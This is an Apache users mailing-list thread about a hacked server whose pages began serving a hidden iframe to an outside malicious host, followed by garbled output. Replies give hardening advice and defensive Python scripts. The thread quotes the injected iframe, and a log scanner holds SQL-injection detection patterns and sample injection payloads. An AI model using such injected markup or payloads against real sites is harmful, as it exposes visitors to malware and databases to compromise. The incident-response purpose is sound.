Posted to users@httpd.apache.org by Oleg Goryunov <ol...@gmail.com> on 2010/04/03 23:03:06 UTC

[users@httpd] Someone hacked my apache2 server

Hello all,
It looks like someone hacked my apache2 server and I am trying to understand
how this could have happened.
This is what happened:
All of a sudden the server - in response to a web-browser request for a page
- started to give a full screen of unknown characters (looked like a long
text with encoding mismatch).
The output was immediate and the same for all the web-sites located on the
server.
Looking at the page source of the output I see the following:
=========

<iframe src=  http://azsxde55.9966.org:8800/ak47/29.html width=1
height=1></iframe>
==================
The address indicated in the beginning of the page code leads to some Chinese
server.
So, somehow it happened that the output of the Apache server was substituted
by this page, which redirected visitors to some Chinese server.

But the strangest thing was that the problem disappeared by itself! So, it
lasted for 10 minutes, then disappeared! And then it started again and
disappeared again. Finally, I shut down Apache until I understand what is going
on...

Any idea how that could happen?  How to reproduce this? How to prevent it?
Where to look for logs? I have checked both the ssh logs and the Apache logs;
there is nothing that seems unusual there...

Any help is appreciated.
Oleg.

Re: [users@httpd] Someone hacked my apache2 server

Posted by Oleg Goryunov <ol...@gmail.com>.
Dan,
Thanks for the advice! I will note that.
Oleg.

2010/4/5 <Da...@ymp.gov>

>
> Oleg,
>
> Some other things to check/do if you don't already know this...
>
> Be sure that the httpd process runs as a completely unprivileged user with
> nothing but read access to ANYTHING.
> Be sure that the content of your site is not owned by the same user as the
> httpd user.  Read-only access should be through group, other or ACL.
> Be sure that the Apache config files, libraries, binaries, etc. are owned
> by a different user than the httpd process user.  Read and execute access
> should be through group, other or ACL.
>
> Same goes for MySQL and any other processes running on the machines.  The
> running processes should NOT have write access to their own config files.
>
> Try to think about the problem from the running process's perspective: if I
> were the httpd/mysql/etc. process, what could I hurt?  Get that to a minimum.
>
> If there is a buffer overflow problem somewhere, you might not be able to
> prevent the in-memory running process from being hacked, but as long as they
> can't hack the files on the server(s), a quick stop/start or reboot should
> fix the problem.
>
> Good Luck!
>
> Dan
>
>

Re: [users@httpd] Someone hacked my apache2 server

Posted by Da...@YMP.GOV.
Oleg,

Some other things to check/do if you don't already know this...

Be sure that the httpd process runs as a completely unprivileged user with 
nothing but read access to ANYTHING.
Be sure that the content of your site is not owned by the same user as the 
httpd user.  Read-only access should be through group, other or ACL.
Be sure that the Apache config files, libraries, binaries, etc. are owned 
by a different user than the httpd process user.  Read and execute access 
should be through group, other or ACL.

Same goes for MySQL and any other processes running on the machines.  The 
running processes should NOT have write access to their own config files.

Try to think about the problem from the running process's perspective: if 
I were the httpd/mysql/etc. process, what could I hurt?  Get that to a 
minimum.

If there is a buffer overflow problem somewhere, you might not be able to 
prevent the in-memory running process from being hacked, but as long as 
they can't hack the files on the server(s), a quick stop/start or reboot 
should fix the problem.

Good Luck!

Dan
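Dan's checklist is easy to state and tedious to verify by hand. As an added example (not code from the thread or from the Apache project), the script below walks the Apache config, content and binary paths and reports every inode the httpd service account owns or could write to through group or world bits. The default paths and the `www-data` account name are assumptions for a Debian-style layout; POSIX ACLs are not consulted, so check those separately with `getfacl` if you use them.

```python
"""Audit whether the httpd service account could change files it should only read.

Added example; not code from the thread or from the Apache project. It applies
Dan's checklist: the account httpd runs as must not own the site content, the
config files, the libraries or the binaries, and must not hold write access to
them through group or world bits. Plain mode bits only: POSIX ACLs are not
consulted. The default paths and the www-data account name are assumptions
for a Debian-style layout.
"""
import grp
import os
import pwd
import stat
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

# Assumed layout; pass your own list to audit() if yours differs.
DEFAULT_PATHS = ["/etc/apache2", "/var/www", "/usr/sbin/apache2", "/usr/lib/apache2"]


@dataclass
class Finding:
    path: str
    reason: str


def service_identity(user: str) -> Tuple[int, Set[int]]:
    """Resolve the uid and every gid (primary + supplementary) of the service account."""
    pw = pwd.getpwnam(user)
    gids = {pw.pw_gid}
    gids.update(g.gr_gid for g in grp.getgrall() if user in g.gr_mem)
    return pw.pw_uid, gids


def write_reason(mode: int, owner_uid: int, owner_gid: int,
                 uid: int, gids: Set[int]) -> Optional[str]:
    """Why the identity (uid, gids) could modify an inode with these bits, or None.

    Ownership alone is a finding: the owner can chmod the file writable again,
    so "read-only but owned by www-data" is no protection at all.
    """
    if owner_uid == uid:
        return "owned by the service account"
    if owner_gid in gids and mode & stat.S_IWGRP:
        return "group-writable by a group the service account belongs to"
    if mode & stat.S_IWOTH:
        return "world-writable"
    return None


def audit_tree(root: str, uid: int, gids: Set[int]) -> List[Finding]:
    """Check root and everything under it.

    Directories count too: write access to a directory lets the process
    replace a read-only file inside it.
    """
    findings: List[Finding] = []
    if not os.path.isdir(root):
        targets = [root]  # a single binary such as /usr/sbin/apache2, or a missing path
    else:
        targets = []
        for dirpath, _dirs, files in os.walk(root):
            targets.append(dirpath)
            targets.extend(os.path.join(dirpath, f) for f in files)
    for path in targets:
        try:
            st = os.lstat(path)
        except OSError as err:
            findings.append(Finding(path, f"cannot stat: {err.strerror}"))
            continue
        if stat.S_ISLNK(st.st_mode):
            continue  # a link's own bits are meaningless; its target is checked if it lies under an audited path
        reason = write_reason(st.st_mode, st.st_uid, st.st_gid, uid, gids)
        if reason:
            findings.append(Finding(path, reason))
    return findings


def audit(paths: Iterable[str] = DEFAULT_PATHS, user: str = "www-data") -> List[Finding]:
    """Run audit_tree over every configured path for the given service account."""
    uid, gids = service_identity(user)
    findings: List[Finding] = []
    for root in paths:
        findings.extend(audit_tree(root, uid, gids))
    return findings


if __name__ == "__main__":
    for f in audit():
        print(f"{f.reason:58} {f.path}")
```

An empty result means the process, even if compromised in memory, cannot persist changes to config or content, which is exactly the property Dan relies on for "a quick stop/start or reboot should fix the problem".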




Re: [users@httpd] Someone hacked my apache2 server

Posted by Oleg Goryunov <ol...@gmail.com>.
Oh, ok. I got it. I have already disabled it (actually, immediately after
the attack).
Thanks for the advice. I appreciate!
Oleg.

On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <cr...@cryptodan.net> wrote:

>
> Oleg,
>
> It's not a vulnerability with MySQL; it is a vulnerable PHP script such as an
> outdated PHPMyAdmin, or PHPMyAdmin itself.  I hardly run it on my servers.  I
> would promptly disable it.
>
>
> Thanks,
> Daniel
>

Re: [users@httpd] Someone hacked my apache2 server

Posted by Daniel Reinhardt <cr...@cryptodan.net>.
--------------------------------------------------
From: "Oleg Goryunov" <ol...@gmail.com>
Sent: 04 April, 2010 13:39
To: <us...@httpd.apache.org>
Subject: Re: [users@httpd] Someone hacked my apache2 server

> Yes, there is a MySQL server. And actually, I noticed that - while the
> server was returning the mentioned hacked page, mysql process was on top of
> the list of the "top" command. Though, it took only 1.5% of the CPU.
> But, mysql is restricted to accept connections from outside world. It only
> listens on local socket.
> What kind of vulnerability does mysql have? Do you know where I can read
> about it?
> Oleg.
>
> On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <cr...@cryptodan.net> wrote:
>
>> Oleg,
>>
>> Are you running any sort of MySQL Database on this machine, and if so is it
>> patched and fully updated along with any php scripts?  What you are showing
>> us is indicative of a SQL Injection Attack.
>>
>> Shocked no one has mentioned it, especially with the rampant incline of the
>> Russian Business Network to spread its malware through the use of SQL
>> Injection on any vulnerable website.
>>
>> Thanks,
>> Daniel
>>
>> ---------------------------------------------------------------------
>> The official User-To-User support forum of the Apache HTTP Server Project.
>> See <URL:http://httpd.apache.org/userslist.html> for more info.
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>  "   from the digest: users-digest-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>

Oleg,

It's not a vulnerability with MySQL; it is a vulnerable PHP script such as an 
outdated phpMyAdmin, or phpMyAdmin itself.  I hardly ever run it on my servers.  I 
would promptly disable it.

Thanks,
Daniel 




Re: [users@httpd] Someone hacked my apache2 server

Posted by Oleg Goryunov <ol...@gmail.com>.
Yes, there is a MySQL server. And actually, I noticed that while the
server was returning the mentioned hacked page, the mysql process was at the top of
the list in the "top" command. Though, it took only 1.5% of the CPU.
But mysql is restricted from accepting connections from the outside world. It only
listens on a local socket.
What kind of vulnerability does mysql have? Do you know where I can read
about it?
Oleg.

On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <cr...@cryptodan.net>wrote:

>
> --------------------------------------------------
> From: "Oleg Goryunov" <ol...@gmail.com>
> Sent: 03 April, 2010 21:03
> To: <us...@httpd.apache.org>
> Subject: [users@httpd] Someone hacked my apache2 server
>
>  Hello all,
>> It looks like someone hacked my apache2 server and I am trying to
>> understand
>> how this could have happened.
>> This is what happened:
>> All of a sudden the server - in response to a web-browser request for a
>> page
>> - started to give a full screen of unknown characters (looked like a long
>> text with encoding mismatch).
>> The output was immediate and the same for all the web-sites located on the
>> server.
>> Looking at the page source of the output I see the following:
>> =========
>>
>> <iframe src=  http://azsxde55.9966.org:8800/ak47/29.html width=1
>> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
>> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь  З╩Ё√Уєул▀.^СЙM
>> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>>
>> ╖\I*┬Ё╒█А  k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
>> 0┘ G й=  г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
>> MЮeJ█n  ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
>> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
>> JЪ█Й╥ ╥ I╩%7░К █o
>>
>> HШЙ5╧p}+г
>> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
>> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]°  ═─a`@Y6╬-┴ЎАа └
>> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
>> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>>
>> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
>> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с  ·~
>> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
>> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^  A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
>> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
>> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS  ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
>> Yў■ЕY,Р`- FE4Юa. ё Жv0и  Ї ^ЎdTуц┬A╬>t╨╡┘  ЩМ╩г╙є│W }ё+▓ fUXЗўs  -wвR
>> F░∙Н╕5▐d ░Ч╛▒
>>
>>
>> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█   ╣н┌Г■{ х?ъ
>> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m  ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx  1°/л1xQщ╕
>> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
>> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║  -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
>> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖  YR∙<} █ ю О╕д╥-q
>> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>>
>> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
>> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5  1▄ И Яєцц|  ─w▄oя
>> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
>> ╙v*чї8x~vётэow+v╨\ П ╥dJ!  │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
>> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& |  ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
>> ¤
>>
>> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?>  ы'ci
>> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
>> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
>> ▄щсМ├
>>
>> би╝9сй+╬B  A& ╔-ЧnдUX▒uu вF В )Odф
>> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
>> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
>>
>> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>>
>> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1  З ёqо]П█rА n:▀А╨
>> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>>
>> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨   х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
>> ╒╢B║  ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
>> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a  ▓▐  69╖   АoX;wц ыlэ╡s   YИLШ@
>> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐  /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
>> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>>
>> ==================
>> The address indicated in the beginning of the page code leads to some
>> Chinese server.
>> So, somehow it happened that the output of the apache server was
>> substituted
>> by this page, which redirected visitors to some chinese server.
>>
>> But the most strange thing was that the problem disappeared by itself! So, it
>> lasted for 10 minutes then disappeared! And then again started and again
>> disappeared. Finally, I turned down apache until I understand what is
>> going on...
>>
>> Any idea how that could happen?  How to reproduce this? How to prevent?
>> Where to look for logs? I have checked both ssh logs and apache logs, there
>> is nothing that could seem unusual there...
>>
>> Any help is appreciated.
>> Oleg.
>>
>>
> Oleg,
>
> Are you running any sort of MySQL Database on this machine, and if so is it
> patched and fully updated along with any php scripts?  What you are showing
> us is indicative of a SQL Injection Attack.
>
> Shocked no one has mentioned it, especially with the rampant incline of the
> Russian Business Network to spread its malware through the use of SQL
> Injection on any vulnerable website.
>
> Thanks,
> Daniel
>
>
>

Re: [users@httpd] Someone hacked my apache2 server

Posted by Daniel Reinhardt <cr...@cryptodan.net>.
--------------------------------------------------
From: "Oleg Goryunov" <ol...@gmail.com>
Sent: 03 April, 2010 21:03
To: <us...@httpd.apache.org>
Subject: [users@httpd] Someone hacked my apache2 server

> Hello all,
> It looks like someone hacked my apache2 server and I am trying to understand
> how this could have happened.
> This is what happened:
> All of a sudden the server - in response to a web-browser request for a page
> - started to give a full screen of unknown characters (looked like a long
> text with encoding mismatch).
> The output was immediate and the same for all the web-sites located on the
> server.
> Looking at the page source of the output I see the following:
> =========
>
> <iframe src=  http://azsxde55.9966.org:8800/ak47/29.html width=1
> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь  З╩Ё√Уєул▀.^СЙM
> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>
> ╖\I*┬Ё╒█А  k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
> 0┘ G й=  г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
> MЮeJ█n  ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
> JЪ█Й╥ ╥ I╩%7░К █o
>
> HШЙ5╧p}+г
> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]°  ═─a`@Y6╬-┴ЎАа └
> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>
> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с  ·~
> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^  A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS  ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
> Yў■ЕY,Р`- FE4Юa. ё Жv0и  Ї ^ЎdTуц┬A╬>t╨╡┘  ЩМ╩г╙є│W }ё+▓ fUXЗўs  -wвR
> F░∙Н╕5▐d ░Ч╛▒
>
>
> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█   ╣н┌Г■{ х?ъ
> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m  ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx  1°/л1xQщ╕
> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║  -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖  YR∙<} █ ю О╕д╥-q
> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>
> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5  1▄ И Яєцц|  ─w▄oя
> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
> ╙v*чї8x~vётэow+v╨\ П ╥dJ!  │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& |  ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
> ¤
>
> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?>  ы'ci
> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
> ▄щсМ├
>
> би╝9сй+╬B  A& ╔-ЧnдUX▒uu вF В )Odф
> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>
> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1  З ёqо]П█rА n:▀А╨
> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>
> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨   х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
> ╒╢B║  ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a  ▓▐  69╖   АoX;wц ыlэ╡s   YИLШ@
> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐  /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>
> ==================
> The address indicated in the beginning of the page code leads to some Chinese
> server.
> So, somehow it happened that the output of the apache server was substituted
> by this page, which redirected visitors to some chinese server.
>
> But the most strange thing was that the problem disappeared by itself! So, it
> lasted for 10 minutes then disappeared! And then again started and again
> disappeared. Finally, I turned down apache until I understand what is going
> on...
>
> Any idea how that could happen?  How to reproduce this? How to prevent?
> Where to look for logs? I have checked both ssh logs and apache logs, there is
> nothing that could seem unusual there...
>
> Any help is appreciated.
> Oleg.
>

Oleg,

Are you running any sort of MySQL Database on this machine, and if so is it 
patched and fully updated along with any php scripts?  What you are showing us 
is indicative of a SQL Injection Attack.

Shocked no one has mentioned it, especially with the rampant incline of the Russian 
Business Network to spread its malware through the use of SQL Injection on any 
vulnerable website.

Thanks,
Daniel 


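Two triage checks a defender would run on a server showing the symptoms in this thread, written here as an added example; it is not code from the thread's participants or from the Apache project. The first function lists iframes in served HTML that are sized 1x1 or hidden by CSS, the injection signature visible in Oleg's page source. The second scans Apache combined-format access log lines for requests carrying SQL-injection style payloads, and for hits on a phpMyAdmin path from a non-loopback address, which is where Daniel's diagnosis (a vulnerable PHP script rather than MySQL itself) points. Assumptions: the combined log format, phpMyAdmin mounted under /phpmyadmin, and sample HTML and log lines that are constructed for the example; only the iframe host azsxde55.9966.org comes from the thread, the other addresses are documentation ranges.

```python
"""Added triage example for the symptoms discussed in this thread (not code from
the thread's participants or from the Apache project).

1. find_hidden_iframes(): list iframes in served HTML that are 1x1 or hidden by
   CSS, the injection signature shown in Oleg's page source.
2. scan_access_log(): flag Apache combined-format access log lines whose request
   carries SQL-injection style payloads, or that reach a phpMyAdmin path from a
   non-loopback address (Daniel's diagnosis: a vulnerable PHP script).

Sample HTML and log lines are constructed for this example; only the iframe
host azsxde55.9966.org comes from the thread.
"""
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# --- 1. hidden iframe detection -------------------------------------------
# Deliberately lenient regexes: injected markup is often sloppy (the one in the
# thread has spaces after "src=" and unquoted values) and a strict HTML parser
# may normalise it away.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")


def _iframe_attrs(tag_body):
    """Turn the text between '<iframe' and '>' into a lower-cased attr dict."""
    return {name.lower(): value.strip("\"'") for name, value in ATTR_RE.findall(tag_body)}


def _is_hidden(attrs):
    def tiny(value):
        try:
            return float(str(value).rstrip("px%")) <= 1
        except ValueError:
            return False
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) and tiny(attrs.get("height"))) \
        or "display:none" in style or "visibility:hidden" in style


def find_hidden_iframes(html):
    """Return the src of every iframe that a visitor would not see."""
    return [
        attrs.get("src", "")
        for attrs in (_iframe_attrs(body) for body in IFRAME_RE.findall(html))
        if _is_hidden(attrs)
    ]


# --- 2. access log scanning ------------------------------------------------
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
ADMIN_PATHS = ("/phpmyadmin",)  # assumption: where phpMyAdmin is mounted
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I)),
    ("declare-var", re.compile(r"\bdeclare\s+@\w+", re.I)),
    ("hex-cast", re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+", re.I)),
    ("tautology", re.compile(r"'\s*(?:or|and)\s+'?\w+'?\s*=\s*'?\w+", re.I)),
    ("timing", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
]


def classify_request(ip, target):
    """Return the reasons a request looks suspicious (empty list if none)."""
    decoded = unquote_plus(unquote_plus(target))  # twice: catches double encoding
    reasons = []
    path = urlsplit(decoded).path.lower()
    try:
        remote = not ipaddress.ip_address(ip).is_loopback
    except ValueError:
        remote = True  # hostnames or garbage in the client field: treat as remote
    if remote and any(path.startswith(p) for p in ADMIN_PATHS):
        reasons.append("admin-tool path")
    reasons.extend("sqli:" + label for label, pat in SQLI_PATTERNS if pat.search(decoded))
    return reasons


def scan_access_log(lines):
    """Return one dict per suspicious request found in combined-format log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["ip"], m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "time": m["time"], "target": m["target"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


# Constructed sample input (documentation address ranges; one iframe host from the thread).
SAMPLE_HTML = (
    "<html><body>"
    "<iframe src=  http://azsxde55.9966.org:8800/ak47/29.html width=1\nheight=1></iframe>"
    '<iframe src="https://www.example.org/embed" width="560" height="315"></iframe>'
    '<iframe src="http://198.51.100.9/x.html" style="display: none"></iframe>'
    "</body></html>"
)
SAMPLE_LOG = """\
203.0.113.7 - - [03/Apr/2010:22:41:13 +0200] "GET /index.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Apr/2010:22:41:20 +0200] "GET /index.php?id=12%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1" 200 5310 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Apr/2010:22:42:01 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 200 4090 "-" "Mozilla/4.0"
127.0.0.1 - - [03/Apr/2010:22:42:30 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 200 4090 "-" "Mozilla/4.0"
203.0.113.7 - - [03/Apr/2010:22:43:44 +0200] "GET /news.php?id=3;DECLARE%20@s%20VARCHAR(4000);SET%20@s=CAST(0x4445434C%20AS%20VARCHAR(4000));EXEC(@s)-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
192.0.2.44 - - [03/Apr/2010:22:45:00 +0200] "POST /contact.php HTTP/1.1" 302 0 "http://example.org/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe ->", src)
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["ip"], hit["status"], hit["reasons"], hit["target"])
```

Run it against the real file with `scan_access_log(open("/var/log/apache2/access.log"))` (path is an assumption; use the vhost's CustomLog). A flagged request that the server answered with 200 deserves more attention than one that got a 500, since the page rendered without error, and because the injected iframe showed up on every site on the host at once, the hidden-iframe check is worth running over the content stored in the database as well as over the rendered pages.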